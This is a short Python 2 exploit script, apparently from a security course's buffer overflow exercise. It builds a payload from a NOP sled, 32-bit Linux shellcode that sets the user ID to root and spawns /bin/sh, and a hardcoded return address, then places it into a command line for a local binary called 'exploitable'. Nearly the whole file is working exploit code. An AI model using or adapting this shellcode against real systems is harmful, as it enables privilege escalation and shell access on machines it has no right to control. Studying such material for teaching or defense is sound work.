c_seguridad/code/bof/exploit.py


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

from time import sleep
from os import system


shellcode = (
    # Buffer offset
    "\x90"*17 +

	# Shellcode (55 chars)
	"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
	"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
	"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
	"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"

    "\xf8\xf7\xff\xbf"
    )

cmd = "./exploitable " + shellcode

print shellcode